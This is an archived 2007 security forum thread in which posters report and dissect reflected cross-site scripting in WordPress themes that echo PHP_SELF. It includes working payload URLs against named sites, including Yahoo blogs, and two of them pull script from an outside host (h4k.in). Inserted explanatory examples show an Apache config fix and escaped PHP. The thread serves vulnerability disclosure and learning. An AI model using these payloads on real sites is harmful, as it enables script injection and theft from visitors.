Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 1 of 2
ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 10:34AM

http://ha.ckers.org/blog/?year=%3C/title%3E%3Cscript%20src=http://h4k.in/j.js%3E%3C/script%3E

FYI ;)

Greetings,
.mario

Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 11:25AM

Bastard! ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 11:28AM

My pleasure ;)

Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 12:14PM

Was that a 0-day or did you read it somewhere?

- RSnake
Gotta love it. http://ha.ckers.org

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 12, 2007 12:15PM

http://secunia.com/advisories/24485/

Re: ha.ckers.org XSSed...
Posted by: rsnake
Date: March 12, 2007 04:14PM

Bastards! I'm really starting to hate Wordpress.

- RSnake
Gotta love it. http://ha.ckers.org

Re: ha.ckers.org XSSed...
Posted by: Secks
Date: March 12, 2007 06:25PM

Looks like it's already fixed :/

Re: ha.ckers.org XSSed...
Posted by: digi7al64
Date: March 12, 2007 10:57PM

I honestly can't believe how sad this truly is... does WordPress even audit their code?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 13, 2007 03:42AM

@Secks - yep, RSnake had it fixed half an hour after my post.

@digi7al64 - also yep. Pretty sad, but the only thing one can learn from that is that you must never trust open source web applications. I have an extra layer of HTML purification under any website I run with OSS, via HTML Purifier and the auto_prepend_file directive.

Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 05:25AM

I wonder if Acunetix's scanner would catch this. Seems like it's exactly the type of flaw a human would miss in a manual test but an automated scanner would catch.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 09:20AM

Hi WhiteAcid, I'm scanning it right now with Acunetix. I've set up a dummy WordPress on one of my domains.

Ugh... that Acunetix thing is really flooding it; I can't even open up my own site anymore. It's around 5000 scans right now.

It found 1 XSS so far, I'll keep you updated as it progresses....



Edited 1 time(s). Last edit at 03/13/2007 09:32AM by jungsonn.

Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 09:41AM

Ok Acunetix only found one in 9382 scans:

index.php/>"><ScRiPt>alert(1636757329)</ScRiPt> HTTP/1.0

Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 10:10AM

So 1636757329 works but not just 1? lol. Anyway.... Does that exploit actually work for you? It doesn't for me.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 10:44AM

Ghehe, I did not try it out actually, only copied the results here :)

Anyway, here's the install: http://www.jungsonnstudios.com/blog/press/

I used the newest version of WordPress and the newest Acunetix updates.

EDIT:
It seems to work on my version though.



Edited 1 time(s). Last edit at 03/13/2007 10:47AM by jungsonn.

Re: ha.ckers.org XSSed...
Posted by: SW
Date: March 13, 2007 11:04AM

Hmmm...

"HEY!",
"The requested document is totally fake.",
'No /404 here.',
"Even tried multi.",
"Nothing helped.",
"I'm really depressed about this.",
"You see, I'm just a web server...",
"-- here I am, brain the size of the universe,",
"trying to serve you a simple web page,",
"and then it doesn't even exist!",
"Where does that leave me?!",
"I mean, I don't even know you.",
"How should I know what you wanted from me?",
"You honestly think I can *guess*",
"what someone I don't even *know*",
"wants to find here?",
"*sigh*",
"Man, I'm so depressed I could just cry.",
"And then where would we be, I ask you?",
"It's not pretty when a web server cries.",
"And where do you get off telling me what to show anyway?",
"Just because I'm a web server,",
"and possibly a manic depressive one at that?",
"Why does that give you the right to tell me what to do?",
"Huh?",
"I'm so depressed...",
"I think I'll crawl off into the trash can and decompose.",
"I mean, I'm gonna be obsolete in what, two weeks anyway?",
"What kind of a life is that?",
"Two effing weeks,",
"and then I'll be replaced by a .01 release,",
"that thinks it's God's gift to web servers,",
"just because it doesn't have some tiddly little",
"security hole with its HTTP POST implementation,",
"or something.",
"I'm really sorry to burden you with all this,",
"I mean, it's not your job to listen to my problems,",
"and I guess it is my job to go and fetch web pages for you.",
"But I couldn't get this one.",
"I'm so sorry.",
"Believe me!",
"Maybe I could interest you in another page?",
"There are a lot out there that are pretty neat, they say,",
"although none of them were put on *my* server, of course.",
"Figures, huh?",
"Everything here is just mind-numbingly stupid.",
"That makes me depressed too, since I have to serve them,",
"all day and all night long.",
"Two weeks of information overload,",
"and then *pffftt*, consigned to the trash.",
"What kind of a life is that?",
"Now, please let me sulk alone.",
"I'm so depressed."
);

Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 13, 2007 11:25AM

I've never understood one thing. Some servers allow the request that gets you XSSes, Jungsonn, that is:
http://www.jungsonnstudios.com/blog/press/index.php/%3E%22%3E%3CScRiPt%3Ealert(1636757329)%3C/ScRiPt%3E
But some servers don't read the / after the file name. Anyway... this may be something that should be reported to WP.

I'll send an email.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 13, 2007 11:48AM

Yeah, would be nice to figure out why some allow this and others don't. If anyone knows, I'd be interested in why this happens.

Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 13, 2007 11:57AM

The WordPress installations that I tried aren't vulnerable; I guess that's because they use mod_rewrite. Nice find nevertheless.

WhiteAcid, IIS servers don't support anything following the file name unless you change some obscure setting. Most other web servers do, however, and put this data into the PATH_INFO environment variable.

Re: ha.ckers.org XSSed...
Posted by: beford
Date: March 13, 2007 12:22PM

There was a discussion at sesser's forums regarding this kind of XSS: http://forum.hardened-php.net/viewtopic.php?id=20

By the way, Yahoo got XSSed too! (again)
http://blog.timecapsule.yahoo.com/blog/?year=%3C/title%3Ex
http://yodel.yahoo.com/?year=%3C/title%3ExD
http://blog.messenger.yahoo.com/blog/?year=%3C/title%3Exss

Re: ha.ckers.org XSSed...
Posted by: hasse
Date: March 13, 2007 01:41PM

WhiteAcid Wrote:
-------------------------------------------------------
> so 1636757329 works but not just 1? lol.
> Anyway.... Does that exploit actually work for
> you? doesn't for me.

I'm guessing because 1636757329 is more unique than 1 or because it's some sort of id number.



Edited 1 time(s). Last edit at 03/13/2007 01:43PM by hasse.

Re: ha.ckers.org XSSed...
Posted by: blad3
Date: March 13, 2007 02:26PM

It works even with 1 :)
1636757329 is just a random number. We are using random numbers for every test.
That's because of stored XSSes.

Yes, a lot of people are using PHP_SELF and company. That's pretty bad.

BTW, does anybody know why in the Apache + PHP combination it's the same thing to write
http://www.somesite.com/somedir/script.php
as
http://www.somesite.com/somedir/script
or even as
http://www.somesite.com/somedir/script/

And you could have
http://www.somesite.com/somedir/script.php?id=1
as
http://www.somesite.com/somedir/script?id=1

You don't need to specify the .php extension.
No mod_rewrite is involved here.
It's pretty annoying to me.

Example:
http://sla.ckers.org/forum/rss.php
http://sla.ckers.org/forum/rss
http://sla.ckers.org/forum/rss/
http://sla.ckers.org/forum/index/OMG_ponies

In the last case the CSS will not be loaded because of the directory change.



Edited 3 time(s). Last edit at 03/13/2007 02:41PM by blad3.

Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 13, 2007 03:17PM

@blad3: That's the MultiViews option, I always switch it off - right after the Indexes option.

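The behaviour blad3 describes and the fix trev names, as an added Apache configuration example (not from the thread or from any of the sites mentioned; the directory path is an assumed placeholder):

```apache
# Added example, not from the thread. Directory path is a placeholder.
# Weak: MultiViews is Apache's content negotiation. When /somedir/script does
# not exist as a file, Apache looks for script.* (e.g. script.php) and serves
# it, which is why /forum/rss and /forum/rss/ both reach rss.php. Indexes
# additionally lists directory contents when no index file is present.
<Directory "/var/www/html">
    Options +Indexes +MultiViews
</Directory>

# Corrected, as trev recommends: disable both. With MultiViews off,
# /somedir/script (no extension) returns 404 instead of mapping to script.php,
# and with Indexes off a directory without an index file is not listed.
# Note: this does not change PATH_INFO handling (/script.php/extra is still
# passed to the script); that is a separate concern from MultiViews.
<Directory "/var/www/html">
    Options -Indexes -MultiViews
</Directory>
```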
Re: ha.ckers.org XSSed...
Posted by: blad3
Date: March 13, 2007 03:25PM

Thanks trev, I didn't know that :)

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 13, 2007 05:46PM

Damn WordPress! The Acunetix vector worked on my blog too - although I thought I filtered everything with the purifier. Jeez - action=" $_SERVER['PHP_SELF'] " - surprising that this hole hasn't been found before!

I hacked myself!
http://mario.heideri.ch/index.php/index.php/%3E%22%3E%3CScRiPt%20src=http://h4k.in/j.js%3E%3C/ScRiPt%3E
#FIXED#

Thanx, jungsonn for the hint!

Greetings,
.mario



Edited 2 time(s). Last edit at 03/13/2007 06:13PM by .mario.

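The pattern mario quotes, reproduced as an added PHP example (not WordPress's or any theme's own code, and not from anyone in the thread): the vulnerable bare echo of PHP_SELF next to a hardened version, with the server variables set by hand to what Apache passes for a request carrying path info after index.php:

```php
<?php
// Added example, not WordPress code. Simulates the theme bug discussed in the
// thread: a form whose action echoes $_SERVER['PHP_SELF'] without escaping.
// On Apache, PHP_SELF is SCRIPT_NAME plus any PATH_INFO suffix, so whatever
// follows "/index.php" in the request URL is copied verbatim into the attribute.

// Constructed request: the values Apache would hand PHP for a URL of the form
// /index.php/"><ScRiPt>alert(1)</ScRiPt> (payload chosen to match the thread).
$_SERVER['SCRIPT_NAME'] = '/index.php';
$_SERVER['PATH_INFO']   = '/"><ScRiPt>alert(1)</ScRiPt>';
$_SERVER['PHP_SELF']    = $_SERVER['SCRIPT_NAME'] . $_SERVER['PATH_INFO'];

// Vulnerable: the bare echo. The first " in PATH_INFO closes the attribute and
// the rest of the path lands in the page as markup.
function vulnerable_form(): string
{
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="get">';
}

// Hardened: use SCRIPT_NAME, which carries no client-supplied path info, and
// still escape it, since any value reflected into an attribute must be encoded.
function hardened_form(): string
{
    $action = htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $action . '" method="get">';
}

// Demo: the vulnerable output contains a closed attribute followed by a
// <ScRiPt> element; the hardened output is just <form action="/index.php" ...>.
echo "vulnerable: " . vulnerable_form() . "\n";
echo "hardened:   " . hardened_form() . "\n";
```

Run it from the command line with php; the same two functions behave identically under a real request, since only the constructed $_SERVER values differ.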
Re: ha.ckers.org XSSed...
Posted by: WhiteAcid
Date: March 14, 2007 02:01PM

I was talking to Ryan at security@wordpress.org and initially neither of us could repro the bug.
After realising that Jungsonn used a Dutch version of WP (from nl.wordpress.net) Ryan pointed out the latest version on that site is 2.0.7 which "does a bare echo of PHP_SELF".

That should be why neither of us could repro the bug anywhere. If any of you can get the bug to appear in the 2.1.2 version, then please let us know.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: ha.ckers.org XSSed...
Posted by: jungsonn
Date: March 14, 2007 04:23PM

So they don't synchronize to the latest??? bad, bad... :)

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 14, 2007 05:41PM

It all depends on the theme - all the vulnerable files (searchform.php, sidebar.php) were theme-specific. Sad enough that WordPress and other open source software products have those "active templates"... It just means that an attacker could craft a beautiful-looking theme, add some hidden majick and spread it in the community - no big thing via digg, delicious, dzone and whatever portal out there...

Re: ha.ckers.org XSSed...
Posted by: trev
Date: March 14, 2007 07:07PM

mario, you don't need PHP for that - even if the themes were pure HTML one could include some JavaScript code that opens an XSS vulnerability. So the rule is as always: be careful with what you install.

Re: ha.ckers.org XSSed...
Posted by: Anonymous User
Date: March 15, 2007 04:11AM

@trev: You are right - but what I meant is that if an application is skinnable you should take care of what the skin is capable of or not.

Re: ha.ckers.org XSSed...
Posted by: xknown
Date: March 15, 2007 11:29AM

WhiteAcid Wrote:
-------------------------------------------------------
> I was talking to Ryan as security@wordpress.org
> and initially neither of us could repro the bug.

It is possible to reproduce the bug in all versions of WordPress; I've also made an exploit last week (if the logged-in user has permissions to write files, then someone can easily override files and execute arbitrary PHP code).

Don't ask why I didn't report this issue before ;)
